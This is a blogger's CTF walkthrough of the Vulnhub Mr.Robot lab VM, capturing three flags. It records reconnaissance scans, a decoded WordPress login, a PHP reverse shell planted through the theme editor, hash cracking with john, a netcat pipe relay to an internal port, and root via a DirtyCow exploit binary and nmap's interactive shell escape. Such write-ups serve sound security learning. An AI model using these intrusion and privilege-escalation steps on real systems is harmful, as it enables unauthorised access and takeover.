[Vulnhub] Mr.Robot - Walkthrough

VM Download page



First a quick nmap scan:

root@kali:~/vulnerhub/mrrobot# nmap -sC -Pn

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-29 14:25 EDT  
Nmap scan report for whoismrrobot.com (  
Host is up (-0.052s latency).  
Not shown: 997 filtered ports  
22/tcp  closed ssh  
80/tcp  open   http  
|_http-title: Site doesn't have a title (text/html).
443/tcp open   https  
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:C0:2C:86 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds  

Check out the 80 port:

It's an awesome web page which emulates the show.

I tried every command available here and there is anything but useful info. (there are even several videos about Mr.R凸b凸t)

Start to hunt the prey

Check out /robots.txt:

User-agent: *  

There is the first flag:

fsocity.dic this must be a dictionary. Let's dirb with this .dic:

root@kali:~/vulnerhub/mrrobot# dirb fsocity.dic 

DIRB v2.22  
By The Dark Raver  

START_TIME: Tue Aug 29 16:00:38 2017  
WORDLIST_FILES: fsocity.dic


GENERATED WORDS: 11452                                                         

---- Scanning URL: ----
==> DIRECTORY:                                   
==> DIRECTORY:                                      
==> DIRECTORY:                                    
+ (CODE:200|SIZE:309)                            
==> DIRECTORY:                                     
==> DIRECTORY:                                    
==> DIRECTORY:                                    
==> DIRECTORY:                                    
==> DIRECTORY:                                     
==> DIRECTORY:                                    
+ (CODE:200|SIZE:516314)                           
+ (CODE:301|SIZE:0)                                  
+ (CODE:302|SIZE:0)                                
+ (CODE:200|SIZE:64)            

END_TIME: Tue Aug 29 16:34:36 2017  
DOWNLOADED: 12185 - FOUND: 5  

Then I start to browse all those links and check the source code and the network traffic at the same time.

It appears that this is a wordpress (:D) blog. But there is nothing interesting after I fired wpscan with several combs of parameters.

So I kept checking all the urls.
When checking /license, I saw a blank page except the following line:

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?  

But if you scroll down or check the source code, you'll find a key:

do you want a password or something?  
root@kali:~/vulnerhub/mrrobot# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d  

Great, now we have a login credential.

BTW, I checked the password in the .dic and found:

root@kali:~/vulnerhub/mrrobot# grep ER28-0652 fsocity.dic  

And later on I reallize that you might be able to find a url like "......./author/elliot", then you can just brute force into it with hydra and that .dic.

But anyway, we are now logined in the wp.

Get a shell

I tried to zip a php-reverse-shell.php and upload the zip file as a plugin and planning to active it to receive the shell but it didn't worked.

Then the super Chao(also known as evilC) came across and gave a big hint: navigate to appearence/editor, click a header.php or something.php on the right side, add your shell php code into the content, update it, then browse the wp blog and enjoy your shell. It works!

$ id    
uid=1(daemon) gid=1(daemon) groups=1(daemon)  
$ w
 19:08:17 up  1:37,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT  
$ uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux  
$ python -c "import pty;pty.spawn('/bin/bash');"

Get robot priviledge

daemon@linux:/home/robot$ ls -l  
ls -l  
total 8  
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5  
cat password.raw-md5  

We need to get the priviledge of robot or root to get the second flag. And there happens be a password file under robot's home. "what a coincident!" :D

root@kali:~/vulnerhub/mrrobot# john --format=raw-md5 pwd.hash --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8  
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])  
Press 'q' or Ctrl-C to abort, almost any other key for status  
abcdefghijklmnopqrstuvwxyz (?)  
1g 0:00:00:00 DONE (2017-08-29 16:49) 6.666g/s 269360p/s 269360c/s 269360C/s abygail..TERRELL  
Use the "--show" option to display all of the cracked passwords reliably  
Session completed  

Cool, now we have robot's passwd!

daemon@linux:/home/robot$ su robot  
su robot  
Password: abcdefghijklmnopqrstuvwxyz  
robot@linux:~$ id  
uid=1002(robot) gid=1002(robot) groups=1002(robot)  
robot@linux:~$ cat key-2-of-3.txt  
cat key-2-of-3.txt  

Second flag: 822c73956184f694993bede3eb39f959

Finding my way to root

robot@linux:/home$ ls -l  
ls -l  
total 4  
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot  
robot@linux:~$ cat /etc/passwd  
cat /etc/passwd  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false  

There are 3 users that have a home but actually there is only one folder under /home which is robot. So I didn't give them too much thoughts.

robot@linux:/home$ netstat -nplt  
netstat -nplt  
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0  *               LISTEN      -  
tcp        0      0*               LISTEN      -  
tcp        0      0*               LISTEN      -  
tcp6       0      0 :::443                  :::*                    LISTEN      -  
tcp6       0      0 :::80                   :::*                    LISTEN      -  

There are ftp, mysql and another 2812 port service running, good.

robot@linux:/var$ ls  
backups  cache    lib  local  lock  log  mail  opt  run  spool  tmp  
robot@linux:/var$ cd mail  
cd mail  
robot@linux:/var/mail$ ls  
robot@linux:/var/mail$ cd ..  
cd ..  
robot@linux:/var$ ls  
backups  cache    lib  local  lock  log  mail  opt  run  spool  tmp  
robot@linux:/var$ cd back  
cd backups/  
robot@linux:/var/backups$ ls  
apt.extended_states.0  group.bak    passwd.bak  
dpkg.status.0           gshadow.bak  shadow.bak  
robot@linux:/var/backups$ cat pass  
cat passwd.bak  
cat: passwd.bak: Permission denied  
robot@linux:/var/backups$ ls -la  
ls -la  
total 356  
drwxr-xr-x  2 root root     4096 Nov 13  2015 .  
drwxr-xr-x 11 root root     4096 Jun 24  2015 ..  
-rw-r--r--  1 root root     7194 Jun 24  2015 apt.extended_states.0
-rw-r--r--  1 root root   331144 Jun 24  2015 dpkg.status.0
-rw-------  1 root root      604 Nov 13  2015 group.bak
-rw-------  1 root shadow    496 Nov 13  2015 gshadow.bak
-rw-------  1 root root     1217 Nov 13  2015 passwd.bak
-rw-------  1 root shadow    885 Nov 13  2015 shadow.bak

Nothing interesting here.

robot@linux:/var/log$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null  
</ -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null  

Nothing interesting here too except /usr/local/bin/nmap. (wtf? there is a nmap?) So I scaned myself with nmap (just for fun :D)

robot@linux:/var$ nmap localhost  
nmap localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2017-08-29 19:22 UTC  
Interesting ports on localhost (  
(The 1658 ports scanned but not shown below are in state: closed)
21/tcp   open  ftp  
80/tcp   open  http  
443/tcp  open  https  
3306/tcp open  mysql  

But it turns out that it is because my limited knowledge. I could root through this nmap. I'll talk about it at the end.

Back to my recon work.
I tried to connect to ftp server but didn't figure out the username. Then I found this:

robot@linux:/etc$ cat ftpuser  
cat ftpusers  
# /etc/ftpusers: list of users disallowed FTP access. See ftpusers(5).


And this:

robot@linux:/etc$ cat vsftpd.all  
cat vsftpd.allowed_users  

Alright, now we have a new target: bitnamiftp. Remember, this name also appeared in /etc/passwd

I tryed mysql and got nothing too there.

Then I nc to 2812 port (because it appeared in the output of netstat), it didn't say anything to me so I suppose it might be a web server. So I send GET / HTTP/1.1 and hit enter twice, I got some html code back.

At this point, I really want to browse the content in a browser because I saw 'mysql and 'ftp' appeared in the shit-like html code.

So I built a tmp proxy (two proxy actually)
on my kali machine:

root@kali:~/vulnerhub/mrrobot# mknod backpipe p  
root@kali:~/vulnerhub/mrrobot# nc -l -k -p 9000 0<backpipe | nc -l -k -p 9001 | tee backpipe  

on the victim machine:

robot@linux:/tmp$ mknod backpipe p  
robot@linux:/tmp$ nc localhost 2812 0<backpipe | nc 9001 | tee backpipe  

Then I type localhost:9000 in the browser of my kali, I can browser it now! but I need to rerun those two lines of nc command every time when I click a new link. Because the server would close the connection after one communication but anyway.

Turns out this is a Monit Service Manager page.
I rerun those two lines of nc and browse to apache

Here, ammmmm, I thought I found the name again: bitnamiftp, but it turns out it's not the name username.. which killed me a lot of time to check the /opt/bitnami/ directory.

Actual root

After all those works, I decided to use the dirty way to root it...
(actually I'd been holding this idea back since I saw that uname -a saying the kernel is 3.13.0.)

I tried overlayfs, didn't work, then 'super' dirtyroot, it worked!

robot@linux:/tmp$ ./cowroot  
DirtyCow root privilege escalation  
Backing up /usr/bin/passwd to /tmp/bak  
Size of binary: 47032  
Racing, this may take a while..  
thread stopped  
thread stopped  
/usr/bin/passwd overwritten
Popping root shell.  
Don't forget to restore /tmp/bak  
root@linux:/tmp# id  
uid=0(root) gid=1002(robot) groups=0(root),1002(robot)  
root@linux:/tmp# cd /root  
cd /root  
root@linux:/root# ls  
firstboot_done  key-3-of-3.txt  
root@linux:/root# cat key  
cat key-3-of-3.txt  

Third flag: 04787ddef27c3dee1ee161b21670b4e4
Great! Now I'm done.

nmap to root

if you type nmap --interactive, then !sh, you are root. (god damm it how can I know about this at this late! but thanks god I know it know).
I learned this from this video. Thanks a lot!
But if you type !bash, you won't get a shell and I don't know why. If someone know the reason, please do leave a message and teach me about this.

flag ?∈ hash

After the root, I checked others' walkthrough and someone said it's might be a md5 hash string and I didn't realize that before.
So I tried to decode it with both fsocity.dic and rockyou.txt, and also in md5decrypt.net but didn't get anything interested so I suppose they are just flags rather than hints.

Alright, thanks for watching!